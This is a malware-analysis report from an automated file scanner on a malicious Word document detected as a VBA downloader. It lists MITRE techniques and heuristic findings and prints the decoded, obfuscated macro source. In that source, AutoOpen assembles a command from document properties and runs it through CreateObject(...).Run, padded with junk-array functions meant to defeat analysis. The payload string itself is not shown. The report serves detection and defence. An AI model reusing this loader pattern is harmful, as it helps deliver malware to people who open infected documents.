MALICIOUS
252
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1140 Deobfuscate/Decode Files or Information
T1204.002 Malicious File
The sample is a malicious Office document containing obfuscated VBA macros. Heuristics indicate an auto-exec loader that uses CreateObject and execution sinks, typical of malware downloaders. ClamAV detection further confirms its malicious nature, identifying it as a VBSDownloader.
Heuristics 9
-
ClamAV: Doc.Macro.VBSDownloader-6336817-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.VBSDownloader-6336817-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
EWPpXAkpH = VTCsvLWGBX + "" + ActiveDocument.BuiltInDocumentProperties("Comments") + wAXPFRVz + dhbfWfN + YcLVAupDD + bNYRgBC + sLkvCDTv + cNMYFpYVAf + sVDhALDG + ZRmETagsfg + rnPphHv CreateObject(dWgVhdXhTH).Run$ EWPpXAkpH + wAXPFRVz + dhbfWfN + YcLVAupDD + bNYRgBC + sLkvCDTv + cNMYFpYVAf + sVDhALDG + ZRmETagsfg + DTVvGrsEucu, 0 DGvnGUChnD = GXxRYCAFrn + MemPLYK = EydRedSP -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
EWPpXAkpH = VTCsvLWGBX + "" + ActiveDocument.BuiltInDocumentProperties("Comments") + wAXPFRVz + dhbfWfN + YcLVAupDD + bNYRgBC + sLkvCDTv + cNMYFpYVAf + sVDhALDG + ZRmETagsfg + rnPphHv CreateObject(dWgVhdXhTH).Run$ EWPpXAkpH + wAXPFRVz + dhbfWfN + YcLVAupDD + bNYRgBC + sLkvCDTv + cNMYFpYVAf + sVDhALDG + ZRmETagsfg + DTVvGrsEucu, 0 DGvnGUChnD = GXxRYCAFrn + MemPLYK = EydRedSP -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
End Function Sub autoopen() vDPSzYYdB -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12676 bytes |
SHA-256: 89dcbf43292d0527bd835827dd1f87c5d054afb0bc72e658d8c1123542ba0020 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
179 of 228 identifiers look randomly generated (e.g. 'MetghHFaHnm') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Function RmKzxZzLx()
YuyHBUpHczu = 3574
Dim SNmtKeh(3574)
pNMApNk = "emAzzRra"
SNmtKeh(674) = NHpSrdBgCXa
SNmtKeh(2250) = SEtRcHcznK
SNmtKeh(3535) = tGPmXPLww
SNmtKeh(2370) = 4310 + 8873 + 6837 + 6073 / 7130 / 7171 / 3130 - 8734 - 7844 + 5021 + 6302
SNmtKeh(799) = HKtFfccG
SNmtKeh(512) = WEKkAuKYUR
SNmtKeh(398) = XZPFzPCDPA
SNmtKeh(2445) = 9037
SNmtKeh(3299) = 5290
SNmtKeh(2947) = AVFteHBKM
SNmtKeh(1063) = rSvWcVCMWVa
SNmtKeh(1968) = exrZZwp
SNmtKeh(2681) = XkPrnnmtv
SNmtKeh(2948) = 6287 + 6738 + 2537 + 4201 / 1818 / 3236 / 1872 - 1612 - 8919 + 5046
For YuyHBUpHczu = 2207 To 245
SNmtKeh(YuyHBUpHczu) = YuyHBUpHczu
Next
HHNZzKT = SNmtKeh(1250) + SNmtKeh(2782) + SNmtKeh(634) + SNmtKeh(3408) + SNmtKeh(1334) + SNmtKeh(3574)
VsndZMphXN = SNmtKeh(1448) + SNmtKeh(3546) + SNmtKeh(3405) + SNmtKeh(1623) + SNmtKeh(914) + SNmtKeh(3375) + SNmtKeh(2715) + SNmtKeh(3574)
LUendTfhVKP = SNmtKeh(1012) + SNmtKeh(553) + SNmtKeh(910) + SNmtKeh(3574)
End Function
Function NtYFRSL()
sCUpELZ = 5751
Dim abZUPhxzA(5751)
SPZUHtR = "tXXknTKRz"
kcvZRmvvHr = "EamgdACZKVG"
abZUPhxzA(4156) = meLfUXKb
abZUPhxzA(4737) = UwYXSBm
abZUPhxzA(2282) = VPcGTYU
abZUPhxzA(3901) = VTVsXnAc
abZUPhxzA(787) = 3388 + 579 / 1127 / 1166 / 9759 - 206 - 6158 + 8144 + 7154 + 1651
abZUPhxzA(3654) = vNDMkaVFkTE
abZUPhxzA(1261) = 156
abZUPhxzA(5361) = hAYgTNhDcY
abZUPhxzA(567) = PsdCAvE
abZUPhxzA(4488) = GDhgbec
abZUPhxzA(5474) = pfpSzxsmfMy
abZUPhxzA(1988) = 3828 + 7834 + 2496 + 3563 / 2836 / 1415 / 4854 - 1344 - 4669 - 9852 + 2222 + 8500
abZUPhxzA(3058) = 5554 + 5707 + 7508 + 8561 / 3699 / 3137 / 1081 - 1029 - 4528 - 1520 + 1854 + 2372 + 8378
abZUPhxzA(800) = 8196 + 177 / 5218 - 7045 - 9303 + 9596 + 3200
For sCUpELZ = 631 To 643
abZUPhxzA(sCUpELZ) = sCUpELZ
Next
EZdFULUF = abZUPhxzA(961) + abZUPhxzA(2292) + abZUPhxzA(284) + abZUPhxzA(4878) + abZUPhxzA(115) + abZUPhxzA(529) + abZUPhxzA(5385) + abZUPhxzA(5751)
hkBBkgZanZ = abZUPhxzA(2585) + abZUPhxzA(4779) + abZUPhxzA(2315) + abZUPhxzA(5216) + abZUPhxzA(785) + abZUPhxzA(2713) + abZUPhxzA(5751)
nvTyLSGRb = abZUPhxzA(4221) + abZUPhxzA(1214) + abZUPhxzA(5751)
End Function
Function tksRwYva()
UBCzRtnrZcV = 123
Dim ZsWtXeWwf(123)
YDrKzTYp = "zaZrNxhM"
maUEvaLvASX = "TvvPzdLws"
wUfagKYFrp = "aMaVvBDwR"
ZsWtXeWwf(80) = PTanFYznt
ZsWtXeWwf(102) = fwCsPSruTV
ZsWtXeWwf(80) = 564 + 8671 + 5432 / 9461 - 1910 + 9576
ZsWtXeWwf(92) = 4701 + 4937 + 9361 + 4742 / 9281 - 1794 - 2813 + 3813
ZsWtXeWwf(80) = bfRPVYgKza
ZsWtXeWwf(105) = rwhkkSungA
ZsWtXeWwf(119) = brNMDeCKnr
ZsWtXeWwf(69) = 2362
ZsWtXeWwf(64) = vCSeafwfK
ZsWtXeWwf(89) = wYttYSBXVaz
ZsWtXeWwf(102) = eewPmtc
ZsWtXeWwf(69) = 3894 + 7657 + 9358 / 380 / 801 - 3481 - 2531 - 2953 + 8168 + 1487 + 1188
ZsWtXeWwf(71) = 5056 + 2400 / 6732 - 7796 - 5033 + 8997 + 8786 + 3055
ZsWtXeWwf(89) = 9011 + 6262 / 5450 / 3313 / 434 - 2847 - 9158 + 4636
For UBCzRtnrZcV = 117 To 106
ZsWtXeWwf(UBCzRtnrZcV) = UBCzRtnrZcV
Next
dTFLpEdx = ZsWtXeWwf(83) + ZsWtXeWwf(87) + ZsWtXeWwf(123)
LKBGMZnkg = ZsWtXeWwf(120) + ZsWtXeWwf(55) + ZsWtXeWwf(85) + ZsWtXeWwf(55) + ZsWtXeWwf(100) + ZsWtXeWwf(85) + ZsWtXeWwf(123)
End Function
Function ppNkdMa()
bdAnBmef = 4276
Dim kyUnTkfkP(4276)
uNSnnWnBB = "ZBrRCyV"
kyUnTkfkP(4068) = vmguPAmadzS
kyUnTkfkP(1211) = eAzHSbMhfT
kyUnTkfkP(585) = 1104 + 7038 + 8211 + 3433 / 2516 / 2700 - 6392 + 861
kyUnTkfkP(499) = 4368 + 1201 + 370 + 7226 / 1899 / 5969 / 86 - 9161 - 5417 - 2030 + 5666 + 7979
kyUnTkfkP(521) = tbutduvSC
kyUnTkfkP(2742) = FPCANcH
kyUnTkfkP(1171) = 1905
kyUnTkfkP(605) = 7438
kyUnTkfkP(705) = 6770
kyUnTkfkP(3660) = 5744
kyUnTkfkP(220) = fgfnwzhWp
kyUnTkfkP(1360) = BHBLUtteMx
kyUnTkfkP(3223) = zxDeasmfxgC
kyUnTkfkP(3365) = 8950 + 4671 + 1180 + 6329 / 2209 - 7059 + 5317
kyUnTkfkP(83) = 1958 + 9788 / 6331 / 633 / 5588 - 7436 - 9814 + 4283
kyUnTkfkP(4195) = 438 + 7760 / 3452 / 480 - 5281 + 2130 + 7054 + 7222
For bdAnBmef = 982 To 1552
kyUnTkfkP(bdAnBmef) = bdAnBmef
Next
wAwhmxEmAUk = kyUnTkfkP(2232) + kyUnTkfkP(4276)
yBEHhEB = kyUnTkfkP(3261) + kyUnTkfkP(373) + kyUnTkfkP(335) + kyUnTkfkP(1789) + kyUnTkfkP(4276)
GBDZYZKEuYR = kyUnTkfkP(2326) + kyUnTkfkP(1839) + kyUnTkfkP(3818) + kyUnTkfkP(3714) + kyUnTkfkP(412) + kyUnTkfkP(4109) + kyUnTkfkP(3546) + kyUnTkfkP(4276)
End Function
Function vxhFEdrGndS()
wrCRnBHrMfw = 8651
Dim VaZHdbKDVrx(8651)
PpdAvTzaH = "MetghHFaHnm"
YBGsZTTgGH = "yBLuTfacW"
VaZHdbKDVrx(4509) = GRRHfBATbw
VaZHdbKDVrx(1530) = 3962 + 1098 + 4726 / 6469 / 8938 / 8906 - 7731 + 5661 + 2439
VaZHdbKDVrx(1317) = 7343 + 6549 / 1925 / 8387 / 3383 - 8567 - 9168 - 2783 + 5516 + 4895
VaZHdbKDVrx(4880) = MHcmDnr
VaZHdbKDVrx(557) = 9621
VaZHdbKDVrx(8028) = 4920
VaZHdbKDVrx(3187) = 7816
VaZHdbKDVrx(7864) = 4505
VaZHdbKDVrx(4030) = ELWmGMNHv
VaZHdbKDVrx(3316) = PUvbMhDb
VaZHdbKDVrx(670) = YfDZsWaUC
VaZHdbKDVrx(833) = YdSNUce
VaZHdbKDVrx(1218) = 8401 + 3689 + 4789 / 7905 - 3689 + 5551 + 8380 + 8663
VaZHdbKDVrx(400) = 1642 + 9587 / 9521 / 6639 / 6984 - 3758 - 9948 + 5989 + 1265
VaZHdbKDVrx(7595) = 3695 + 3463 + 3623 / 2605 / 3309 / 422 - 8136 - 1614 + 979 + 5018 + 6966
For wrCRnBHrMfw = 3270 To 3243
VaZHdbKDVrx(wrCRnBHrMfw) = wrCRnBHrMfw
Next
raFMSGnSZzs = VaZHdbKDVrx(3192) + VaZHdbKDVrx(7663) + VaZHdbKDVrx(6555) + VaZHdbKDVrx(937) + VaZHdbKDVrx(1577) + VaZHdbKDVrx(5817) + VaZHdbKDVrx(4364) + VaZHdbKDVrx(8651)
PyxnFzRe = VaZHdbKDVrx(6874) + VaZHdbKDVrx(8296) + VaZHdbKDVrx(3804) + VaZHdbKDVrx(1877) + VaZHdbKDVrx(4287) + VaZHdbKDVrx(8651)
End Function
Sub autoopen()
vDPSzYYdB
End Sub
Public Function FdwUpwVUee(PHRPwRnVEyz)
DGvnGUChnD = GXxRYCAFrn + MemPLYK = EydRedSP
rHZMMWUrS = UxkLMUyEad + zMSkUmM = gWDbnvAe
dtsmDXsgC = ePXgwEpngNx + cDZravS = mPgbSmEynT
crvANEyzctb = dmNgvXphN + yZhvNaU = GLTaPdPtYt
gpEfpsww = ActiveDocument.CustomDocumentProperties(PHRPwRnVEyz)
FdwUpwVUee = gpEfpsww
DGvnGUChnD = GXxRYCAFrn + MemPLYK = EydRedSP
rHZMMWUrS = UxkLMUyEad + zMSkUmM = gWDbnvAe
dtsmDXsgC = ePXgwEpngNx + cDZravS = mPgbSmEynT
crvANEyzctb = dmNgvXphN + yZhvNaU = GLTaPdPtYt
End Function
Public Function vDPSzYYdB()
DGvnGUChnD = GXxRYCAFrn + MemPLYK = EydRedSP
rHZMMWUrS = UxkLMUyEad + zMSkUmM = gWDbnvAe
dtsmDXsgC = ePXgwEpngNx + cDZravS = mPgbSmEynT
crvANEyzctb = dmNgvXphN + yZhvNaU = GLTaPdPtYt
dWgVhdXhTH = FdwUpwVUee("npMsbYW") + FdwUpwVUee("bULeHHZSpVh") + wAXPFRVz + dhbfWfN + YcLVAupDD + bNYRgBC + sLkvCDTv + cNMYFpYVAf + sVDhALDG + ZRmETagsfg + FdwUpwVUee("KEgnwSct") + FdwUpwVUee("WRdPfTSAc") + FdwUpwVUee("pTnYSZpAdY")
DGvnGUChnD = GXxRYCAFrn + MemPLYK = EydRedSP
rHZMMWUrS = UxkLMUyEad + zMSkUmM = gWDbnvAe
dtsmDXsgC = ePXgwEpngNx + cDZravS = mPgbSmEynT
crvANEyzctb = dmNgvXphN + yZhvNaU = GLTaPdPtYt
VTCsvLWGBX = FdwUpwVUee("mdxvHAVFP") + FdwUpwVUee("xsRKsrtCYd") + FdwUpwVUee("aDPTvwWXRkL") + FdwUpwVUee("AmPpFgNKeKR") + FdwUpwVUee("pScrRKsP") + wAXPFRVz + dhbfWfN + YcLVAupDD + bNYRgBC + sLkvCDTv + cNMYFpYVAf + sVDhALDG + ZRmETagsfg + FdwUpwVUee("MWkgvESPex")
EWPpXAkpH = VTCsvLWGBX + "" + ActiveDocument.BuiltInDocumentProperties("Comments") + wAXPFRVz + dhbfWfN + YcLVAupDD + bNYRgBC + sLkvCDTv + cNMYFpYVAf + sVDhALDG + ZRmETagsfg + rnPphHv
CreateObject(dWgVhdXhTH).Run$ EWPpXAkpH + wAXPFRVz + dhbfWfN + YcLVAupDD + bNYRgBC + sLkvCDTv + cNMYFpYVAf + sVDhALDG + ZRmETagsfg + DTVvGrsEucu, 0
DGvnGUChnD = GXxRYCAFrn + MemPLYK = EydRedSP
rHZMMWUrS = UxkLMUyEad + zMSkUmM = gWDbnvAe
dtsmDXsgC = ePXgwEpngNx + cDZravS = mPgbSmEynT
crvANEyzctb = dmNgvXphN + yZhvNaU = GLTaPdPtYt
End Function
Function nNdWbhmVUB()
UcNukyAv = 7898
Dim sMgukknAer(7898)
GkuSFfnWw = ("fXkeyBhxgKy")
yUYPsMRUcz = ("rxxVrCmC")
rhteUFYbSyv = ("fenMuWzFDc")
sMgukknAer(831) = faUvkwavayb
sMgukknAer(4222) = DprvXCL
sMgukknAer(4513) = 1626 + 2438 + 4903 + 8095 / 2241 - 4094 - 9208 + 7094 + 2282 + 2234
sMgukknAer(3347) = 1642 + 5452 + 8694 / 8512 / 6901 - 6072 - 2601 - 959 + 5342 + 9317 + 6492
sMgukknAer(1092) = PprLXLs
sMgukknAer(4865) = 3367
sMgukknAer(5600) = 9246
sMgukknAer(280) = 5283
sMgukknAer(580) = 5625
sMgukknAer(4329) = UMWYYmrX
sMgukknAer(3768) = weGhaGzNWY
sMgukknAer(6185) = 7114 + 2196 + 3909 / 2994 / 1140 - 938 - 5000 + 281
CrrusVS = sMgukknAer(3621) + sMgukknAer(2692) + sMgukknAer(4076) + sMgukknAer(5182) + sMgukknAer(7395) + sMgukknAer(5642) + sMgukknAer(7898)
End Function
Function SaamMDmxw()
EUxkMUvY = 4245
Dim cWnYvbCLew(4245)
dvvkNab = ("AgNexMN")
cWnYvbCLew(870) = BrTKMuaY
cWnYvbCLew(3936) = mrtZYVAmH
cWnYvbCLew(3617) = 9651 + 6361 / 809 / 7941 - 2506 - 5352 + 3092
cWnYvbCLew(2198) = 7599 + 598 / 2875 / 8572 - 3121 - 6394 - 727 + 5519 + 1960
cWnYvbCLew(3445) = 3625 + 772 + 6339 + 9049 / 5598 / 6479 / 3584 - 2110 + 5359
cWnYvbCLew(1714) = tuAXuUCfg
cWnYvbCLew(526) = dnzgfyALNP
cWnYvbCLew(1151) = umPpZZs
cWnYvbCLew(246) = nccfeHR
cWnYvbCLew(3329) = 6278
cWnYvbCLew(3972) = 9242
cWnYvbCLew(516) = 1850
cWnYvbCLew(2755) = ZetaZpv
cWnYvbCLew(2363) = 9412 + 1974 + 6995 + 4418 / 1018 / 8210 - 427 - 8118 + 9659 + 7195 + 4067
cWnYvbCLew(2350) = 1008 + 1666 + 5826 + 6444 / 1714 - 5268 - 4131 - 4999 + 7324
cWnYvbCLew(2499) = 9936 + 7564 / 7045 - 9997 - 7827 - 8371 + 4373
CpFNDge = cWnYvbCLew(3903) + cWnYvbCLew(2644) + cWnYvbCLew(2497) + cWnYvbCLew(948) + cWnYvbCLew(385) + cWnYvbCLew(4245)
subWyhNuu = cWnYvbCLew(1361) + cWnYvbCLew(2769) + cWnYvbCLew(3325) + cWnYvbCLew(1316) + cWnYvbCLew(790) + cWnYvbCLew(2472) + cWnYvbCLew(2345) + cWnYvbCLew(4245)
PVfxUpUSTT = cWnYvbCLew(1610) + cWnYvbCLew(4245)
End Function
Function vvBeFshyn()
vTrsDbPgdT = 9326
Dim pdXUDRP(9326)
hxFUCDnEfZ = ("uUWgMLXHEKA")
YaHRVXMe = ("RNwESFuKyrV")
UbZunZsrh = ("kGhznAG")
BhVtBLyA = ("AzLFFvraD")
pdXUDRP(2747) = TTLAhExm
pdXUDRP(3835) = EChHVzDTd
pdXUDRP(174) = NGuHacraR
pdXUDRP(3056) = TgYZdwC
pdXUDRP(6238) = 7882 + 1139 + 7161 + 9457 / 8627 / 3410 / 9296 - 9933 - 8826 - 6426 + 6801 + 3607 + 5107
pdXUDRP(8938) = 3293 + 9185 / 6138 / 7012 - 5463 - 610 + 3389 + 7586 + 5645
pdXUDRP(1553) = 6295 + 4770 + 5957 + 2524 / 3561 - 2948 + 7629 + 6597 + 957
pdXUDRP(6613) = 3040 + 3434 + 4837 + 6259 / 3031 / 4780 - 4832 + 5582
pdXUDRP(518) = GMXtdaUGhmh
pdXUDRP(4172) = bvcTPmBxTx
pdXUDRP(2976) = 7776
pdXUDRP(2908) = 8814
pdXUDRP(4202) = FhNSstWApW
pdXUDRP(5025) = XhxNkVeXV
pdXUDRP(7677) = 1305 + 3109 + 5091 / 5515 - 1692 + 7462 + 7608 + 4508
pdXUDRP(2228) = 1424 + 8544 + 5111 + 293 / 8766 - 3223 - 463 - 3418 + 252 + 3647 + 3178
pdXUDRP(7146) = 5758 + 5724 / 9331 / 1091 / 1771 - 9114 - 7202 - 4673 + 4200 + 2947
kNkDHYDNfRc = pdXUDRP(6396) + pdXUDRP(9326)
ewhxnMuADCA = pdXUDRP(8166) + pdXUDRP(2633) + pdXUDRP(5053) + pdXUDRP(7750) + pdXUDRP(5159) + pdXUDRP(5774) + pdXUDRP(1065) + pdXUDRP(9326)
PKzPEyUrF = pdXUDRP(1768) + pdXUDRP(4317) + pdXUDRP(3623) + pdXUDRP(751) + pdXUDRP(9326)
End Function
Function VBCtELkpb()
YurxyBnS = 4127
Dim yAXKHmt(4127)
hbCUbywekp = ("upFAGWB")
yAXKHmt(2599) = VvYmnTHSm
yAXKHmt(3378) = 7069 + 6748 + 4759 / 1924 / 6338 - 1018 + 1488
yAXKHmt(2793) = 9539 + 224 / 3357 / 3927 - 3499 - 4221 + 5182 + 9498 + 2270
yAXKHmt(575) = MFEDfrwxmD
yAXKHmt(2662) = YVrbTuE
yAXKHmt(2081) = Xzwmasn
yAXKHmt(561) = rtcpNHGV
yAXKHmt(865) = 8676
yAXKHmt(1530) = 1372
yAXKHmt(318) = 2696
yAXKHmt(3170) = 6815
yAXKHmt(704) = paRRnTscNSZ
yAXKHmt(3081) = 423 + 6560 + 7709 / 5594 / 4621 - 7059 - 2540 + 2624 + 4152
EZCurYX = yAXKHmt(1509) + yAXKHmt(276) + yAXKHmt(4127)
End Function
Function fNxwesNN()
AFUDvyPsvD = 989
Dim DmukrNf(989)
xLtPMZUKCC = ("FMgvLzutVn")
DmukrNf(523) = ANZVyAzrKs
DmukrNf(276) = BfEffXKCNve
DmukrNf(795) = cHgZBbZUtPu
DmukrNf(796) = uafAdCb
DmukrNf(518) = 9146 + 4065 + 6458 + 4836 / 1249 - 2383 - 5855 + 2551
DmukrNf(870) = 2182 + 5737 / 637 / 7779 - 404 - 9275 + 3549 + 3126 + 7905
DmukrNf(801) = FsWkkBGTade
DmukrNf(774) = fFSdYTWmCzb
DmukrNf(578) = 3679
DmukrNf(708) = 2468
DmukrNf(710) = 1388
DmukrNf(655) = 1769
DmukrNf(396) = xpaMTVrBKmV
DmukrNf(186) = 6774 + 4994 + 7616 + 742 / 2768 / 8527 - 4636 + 7298 + 4067
DmukrNf(373) = 8217 + 8135 + 5359 / 7275 - 3641 - 368 + 1975
SYvxmpMC = DmukrNf(670) + DmukrNf(989)
pUuNzFfHLf = DmukrNf(814) + DmukrNf(465) + DmukrNf(989)
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.